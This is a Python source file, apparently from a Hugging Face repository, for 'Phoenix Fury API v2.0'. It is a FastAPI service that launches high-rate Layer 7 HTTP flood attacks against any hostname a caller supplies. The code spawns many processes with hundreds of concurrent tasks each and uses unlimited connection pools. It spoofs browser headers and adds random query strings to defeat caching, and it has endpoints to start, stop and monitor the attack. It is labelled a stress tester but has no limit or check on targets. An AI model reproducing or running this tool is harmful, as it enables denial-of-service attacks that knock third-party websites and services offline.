4 / phoenix_fury_api.py
Samuraiog's picture
Create phoenix_fury_api.py
9cb507d verified
raw
history blame
14.1 kB
# ====================================================================================
# PHOENIX FURY API v2.0 - HIGH-RPS EDITION
#
# - RE-ARCHITECTED: Uses multiprocessing.Manager and shared memory counters
# for near-zero overhead statistics, enabling massive RPS scaling.
# - OPTIMIZED L7: Aggressive aiohttp connection pooling and a lean async
# worker loop designed for maximum request throughput.
# - SIMPLIFIED STATE: Centralized state management for instant status updates.
#
# *** BUILT FOR MAXIMUM L7 REQUESTS PER SECOND (RPS) ***
# ====================================================================================
import socket
import struct
import random
import time
import multiprocessing
import threading
import asyncio
import aiohttp
import os
import sys
import psutil
import uvloop
from typing import Literal, Optional, List
from ctypes import c_bool, c_ulonglong
# FastAPI & Pydantic
from fastapi import FastAPI, HTTPException, BackgroundTasks
from pydantic import BaseModel, Field, validator
import uvicorn
# Apply uvloop for a faster asyncio event loop
asyncio.set_event_loop_policy(uvloop.EventLoopPolicy())
# --- Application Setup & Constants ---
app = FastAPI(
title="🔥 Phoenix Fury API v2.0",
description="A high-RPS, multi-process L4/L7 stress testing tool. Re-architected for maximum performance. Requires root/admin privileges for Layer 4 attacks.",
version="2.0.0"
)
CPU_COUNT = psutil.cpu_count(logical=True)
STATS_BATCH_UPDATE_SIZE = 200 # How many requests a worker makes before updating the shared counter
# --- Realistic Browser Headers ---
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0",
]
HTTP_HEADERS = {
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "none",
"Sec-Fetch-User": "?1",
"TE": "trailers",
}
# ====================================================================================
# GLOBAL SHARED STATE (HIGH PERFORMANCE)
# ====================================================================================
# Using a Manager is the cleanest way to share complex state between processes.
# For raw performance, Value/Event are used for high-frequency updates.
manager = multiprocessing.Manager()
STATE = manager.dict()
STOP_EVENT = multiprocessing.Event()
TOTAL_SENT_COUNTER = multiprocessing.Value(c_ulonglong, 0)
def reset_state():
"""Resets the shared state to default values."""
STATE.clear()
STATE.update({
"attack_running": False,
"attack_type": "None",
"target_host": "None",
"target_ip": "None",
"port": 0,
"duration": 0,
"start_time": 0.0,
"processes": 0,
"current_rate": 0.0,
})
STOP_EVENT.clear()
with TOTAL_SENT_COUNTER.get_lock():
TOTAL_SENT_COUNTER.value = 0
reset_state() # Initialize on startup
# ====================================================================================
# Pydantic API Models
# ====================================================================================
class L7Config(BaseModel):
target: str = Field(..., description="Target hostname or IP address (e.g., http://example.com)")
port: int = Field(..., ge=1, le=65535, description="Target port")
duration: int = Field(..., ge=10, description="Attack duration in seconds")
processes: int = Field(CPU_COUNT, ge=1, le=CPU_COUNT*4, description=f"Number of processes to spawn. Defaults to CPU cores ({CPU_COUNT}).")
concurrency_per_process: int = Field(512, ge=1, le=4096, description="Concurrent async tasks per process.")
method: Literal["get", "post", "head"] = Field("get", description="HTTP method.")
path: str = Field("/", description="Request path")
class StatusResponse(BaseModel):
attack_running: bool
attack_type: str
target: str
port: int
duration: int
elapsed_time: float
processes: int
total_requests_sent: int
current_rate_rps: float
cpu_usage_percent: float
memory_usage_percent: float
# ====================================================================================
# CORE UTILS & NETWORKING
# ====================================================================================
def resolve_target(target: str) -> str:
"""Safely resolve hostname to IP."""
try:
# Handle URLs like http://domain.com
if "://" in target:
target = target.split("://")[1].split("/")[0]
return socket.gethostbyname(target)
except socket.gaierror:
raise HTTPException(status_code=400, detail=f"Could not resolve hostname: {target}")
# ====================================================================================
# HIGH-PERFORMANCE L7 WORKER
# ====================================================================================
async def l7_task(session, url, method, stop_event, shared_counter):
"""A single async task that hammers a URL in a loop."""
local_counter = 0
while not stop_event.is_set():
try:
# Add a random query param to bypass caches
request_url = f"{url}?{random.randint(1, 99999999)}"
async with session.request(method, request_url, ssl=False):
local_counter += 1
if local_counter >= STATS_BATCH_UPDATE_SIZE:
with shared_counter.get_lock():
shared_counter.value += local_counter
local_counter = 0
except Exception:
# In a stress test, we expect errors. Count them as attempts.
local_counter += 1
if local_counter >= STATS_BATCH_UPDATE_SIZE:
with shared_counter.get_lock():
shared_counter.value += local_counter
local_counter = 0
# Yield control to the event loop immediately
await asyncio.sleep(0)
# Final update before exiting
if local_counter > 0:
with shared_counter.get_lock():
shared_counter.value += local_counter
async def l7_worker_main(url, method, concurrency, stop_event, shared_counter):
"""Main async function for a single worker process."""
headers = {**HTTP_HEADERS, "User-Agent": random.choice(USER_AGENTS)}
# Aggressive connector settings for high RPS
connector = aiohttp.TCPConnector(
limit_per_host=0, # No limit on connections per host
limit=None, # No limit on total connections
force_close=False, # Reuse connections
enable_keepalive=True,
use_dns_cache=True,
ttl_dns_cache=300, # Cache DNS for 5 mins
ssl=False
)
timeout = aiohttp.ClientTimeout(total=10, connect=5)
async with aiohttp.ClientSession(connector=connector, headers=headers, timeout=timeout) as session:
tasks = [
l7_task(session, url, method, stop_event, shared_counter)
for _ in range(concurrency)
]
await asyncio.gather(*tasks)
def l7_worker_process(target_ip, port, path, method, concurrency, stop_event, shared_counter):
"""The entry point for each spawned L7 attack process."""
# Construct the base URL. aiohttp handles the Host header correctly.
url = f"http://{target_ip}:{port}{path}"
try:
asyncio.run(l7_worker_main(url, method, concurrency, stop_event, shared_counter))
except KeyboardInterrupt:
pass # Allow clean exit
except Exception as e:
print(f"[Process {os.getpid()}] Worker error: {e}", file=sys.stderr)
# ====================================================================================
# ATTACK MANAGER & STATE CONTROLLER
# ====================================================================================
active_processes: List[multiprocessing.Process] = []
def start_attack(config: L7Config):
"""Initiates the L7 attack."""
if STATE["attack_running"]:
print("Attack start requested, but one is already running.")
return
try:
target_ip = resolve_target(config.target)
# --- Update Global State ---
STATE["attack_running"] = True
STATE["target_host"] = config.target
STATE["target_ip"] = target_ip
STATE["port"] = config.port
STATE["duration"] = config.duration
STATE["attack_type"] = f"L7-{config.method.upper()}"
STATE["start_time"] = time.time()
STATE["processes"] = config.processes
print(f"🔥 Starting {STATE['attack_type']} attack on {STATE['target_host']}:{STATE['port']} for {STATE['duration']}s")
# --- Spawn Worker Processes ---
for _ in range(config.processes):
p = multiprocessing.Process(
target=l7_worker_process,
args=(
target_ip,
config.port,
config.path,
config.method,
config.concurrency_per_process,
STOP_EVENT,
TOTAL_SENT_COUNTER
)
)
active_processes.append(p)
p.start()
# --- Schedule the stop ---
main_thread = threading.Thread(target=timed_stop, args=(config.duration,))
main_thread.start()
except Exception as e:
print(f"Failed to start attack: {e}", file=sys.stderr)
stop_attack_immediately()
def timed_stop(duration: int):
"""Waits for the duration and then stops the attack."""
time.sleep(duration)
print(f"Duration of {duration}s reached. Stopping attack.")
stop_attack_immediately()
def stop_attack_immediately():
"""Stops the attack and cleans up resources."""
if not STATE["attack_running"]:
return {"status": "success", "message": "No attack was running."}
print("🛑 Sending stop signal to all worker processes...")
STOP_EVENT.set()
for p in active_processes:
p.join(timeout=5) # Give processes time to exit cleanly
if p.is_alive():
print(f"Process {p.pid} did not terminate gracefully, forcing termination.")
p.terminate()
active_processes.clear()
elapsed = time.time() - STATE['start_time']
total_sent = TOTAL_SENT_COUNTER.value
avg_rate = total_sent / elapsed if elapsed > 0 else 0
print("="*40)
print("✅ ATTACK TERMINATED.")
print(f" Total Requests: {total_sent:,}")
print(f" Elapsed Time: {elapsed:.2f} seconds")
print(f" Average Rate: {avg_rate:,.2f} RPS")
print("="*40)
reset_state()
return {"status": "success", "message": "Attack stopped."}
def stats_calculator():
"""A background thread to calculate RPS continuously."""
last_check_time = time.time()
last_count = 0
while True:
time.sleep(1)
if STATE["attack_running"]:
now = time.time()
current_count = TOTAL_SENT_COUNTER.value
elapsed = now - last_check_time
if elapsed > 0:
rate = (current_count - last_count) / elapsed
STATE["current_rate"] = rate
last_check_time = now
last_count = current_count
else:
if STATE["current_rate"] != 0:
STATE["current_rate"] = 0
last_count = 0
# ====================================================================================
# FASTAPI ENDPOINTS
# ====================================================================================
@app.on_event("startup")
def on_startup():
"""Start the background stats thread."""
reset_state()
stats_thread = threading.Thread(target=stats_calculator, daemon=True)
stats_thread.start()
@app.post("/attack/layer7")
def api_start_l7_attack(config: L7Config):
if STATE["attack_running"]:
raise HTTPException(status_code=409, detail="An attack is already in progress.")
# We run the attack logic in a separate thread to not block the API response
attack_thread = threading.Thread(target=start_attack, args=(config,))
attack_thread.start()
return {"status": "success", "message": f"L7 {config.method.upper()} attack initiated on {config.target}:{config.port}"}
@app.post("/attack/stop")
def api_stop_attack():
if not STATE["attack_running"]:
return {"status": "info", "message": "No attack is currently running."}
response = stop_attack_immediately()
return response
@app.get("/status", response_model=StatusResponse)
def get_status():
"""Provides a real-time status of the ongoing attack."""
elapsed = (time.time() - STATE["start_time"]) if STATE["attack_running"] else 0
return StatusResponse(
attack_running=STATE["attack_running"],
attack_type=STATE["attack_type"],
target=f"{STATE['target_host']} ({STATE['target_ip']})",
port=STATE["port"],
duration=STATE["duration"],
elapsed_time=round(elapsed, 2),
processes=STATE["processes"],
total_requests_sent=TOTAL_SENT_COUNTER.value,
current_rate_rps=round(STATE["current_rate"], 2),
cpu_usage_percent=psutil.cpu_percent(),
memory_usage_percent=psutil.virtual_memory().percent
)
@app.get("/")
def root():
return {"message": "🔥 Phoenix Fury API v2.0 - High-RPS Edition", "docs": "/docs"}
# --- Main Execution ---
if __name__ == "__main__":
multiprocessing.freeze_support()
print("Phoenix Fury API v2.0 starting up...")
print(f"Detected {CPU_COUNT} logical CPU cores.")
uvicorn.run(app, host="0.0.0.0", port=8000)